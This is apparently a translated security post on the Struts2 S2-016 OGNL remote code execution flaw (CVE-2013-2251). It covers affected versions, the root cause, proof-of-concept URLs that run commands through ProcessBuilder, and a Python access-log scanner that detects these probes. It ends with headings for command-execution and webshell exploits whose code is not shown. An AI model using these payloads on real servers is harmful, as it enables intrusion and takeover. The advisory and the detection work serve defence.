Description of the latest Struts2 remote code execution vulnerability (S2-016)
Struts has another remote code execution vulnerability! In this one, an attacker can remotely execute malicious code by manipulating request parameters. In versions before Struts 2.3.15.1, the values following the action:, redirect: and redirectAction: parameter prefixes are not properly filtered, which leads to OGNL code execution.
Details
Affected versions: Struts 2.0.0 - Struts 2.3.15
Reporter: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE ID: CVE-2013-2251
Proof of concept
The parameter value is evaluated as an OGNL expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Code execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Root cause
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
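As an added defensive example (not part of the original page or of the Struts project), the following Python scans web-server access log lines for the pattern described above: a parameter name beginning with one of the navigation prefixes whose target contains an OGNL expression marker, after undoing the nested percent-encoding (%25{) used in the proof-of-concept URLs. The log lines, addresses and function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Navigation prefixes that DefaultActionMapper evaluated as OGNL before 2.3.15.1.
NAV_PREFIXES = ("action:", "redirect:", "redirectAction:")
# Start of an OGNL expression inside the navigation target ("%{" or "${").
OGNL_MARKER = re.compile(r"[%$]\{")
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines (addresses are from documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jul/2013:10:00:01 +0000] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 200 512
203.0.113.5 - - [17/Jul/2013:10:00:02 +0000] "GET /struts2-showcase/employee/save.action?redirect:%25{3*4} HTTP/1.1" 302 0
198.51.100.7 - - [17/Jul/2013:10:00:03 +0000] "GET /struts2-showcase/employee/save.action?redirectAction:listEmployees HTTP/1.1" 302 0
198.51.100.7 - - [17/Jul/2013:10:00:04 +0000] "GET /struts2-showcase/employee/save.action?name=Bob HTTP/1.1" 200 1024
"""

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding, e.g. '%25{' -> '%{'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_s2_016_probe(target: str) -> bool:
    """True if the query string carries a navigation prefix whose target
    looks like an OGNL expression rather than a plain action name."""
    _, sep, query = target.partition("?")
    if not sep:
        return False
    for raw_param in query.split("&"):
        name = fully_decode(raw_param).split("=", 1)[0]
        for prefix in NAV_PREFIXES:
            if name.startswith(prefix) and OGNL_MARKER.search(name[len(prefix):]):
                return True
    return False

def scan_access_log(lines):
    """Return (line_number, request_target) for every line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_s2_016_probe(match.group(1)):
            hits.append((number, match.group(1)))
    return hits
```

A legitimate redirectAction:listEmployees target is not flagged, since only targets that contain an expression marker count as probes.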
The following is for teaching and research purposes only; illegal use is strictly prohibited!
EXP for executing arbitrary commands, thanks to X for providing it:
EXP for revealing the website path, thanks to h4ck0r for providing it:
Python script for executing arbitrary commands, thanks to h4ck0r for providing it:
GETSHELL EXP, thanks to coffee for providing it:
Then use the following code to write the shell:
This generates 1.jsp in the current directory.